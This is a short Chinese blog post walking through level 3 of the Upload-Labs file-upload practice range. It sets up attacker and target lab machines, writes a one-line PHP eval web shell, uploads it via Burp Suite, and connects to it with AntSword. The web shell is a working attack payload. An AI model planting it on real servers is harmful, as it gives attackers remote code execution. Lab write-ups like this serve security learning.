Upload-Labs-Pass-03

前行的跋涉者

 关注

阅读 81

2022-04-13

一、环境搭配

攻击机:kaliIP:192.168.0.112
靶机:Windows2008IP:192.168.0.130:9006

二、文件上传

1、制作一句话木马

命令:<?php @eval($_POST['hacker']); ?>

2、设置代理

设置浏览器代理

设置BurpSuite代理

 3、文件上传

 

设置完Payload后,点击Start attcck。

 复制URL,进入浏览器,发现图片上传成功,右键点击图片使用新标签打开图片,可以发现图片上传的路径。

 4、使用蚁剑连接木马

添加数据:将图片路径复制到URL地址,设置密码(一句话木马中的Hacker),成功连接。

 

 

 

 

 

 

 

 

相关推荐

upload-labs靶场Pass-03

我是小小懒 17 0 0

Upload-Labs-Pass-06

西风白羽 75 0 0

文件上传漏洞靶场upload-labs学习(pass11-pass15)

Hyggelook 60 0 0

文件上传漏洞靶场upload-labs学习(pass16-pass21)

迎月兮 73 0 0

upload-labs_pass19_条件竞争+apache解析漏洞

看山远兮 49 0 0

文件上传漏洞--Upload-labs--Pass01--前端绕过

玩物励志老乐 11 0 0

upload-labs靶场-Pass-09关-思路以及过程

未定义变量 84 0 0

upload-labs靶场-Pass-12关-思路以及过程

雅典娜的棒槌 65 0 0

upload-labs

今天你读书了吗 133 0 0

upload-labs/Pass-07 未知后缀名解析漏洞复现

女侠展昭 32 0 0

精彩评论(0)

0 0 举报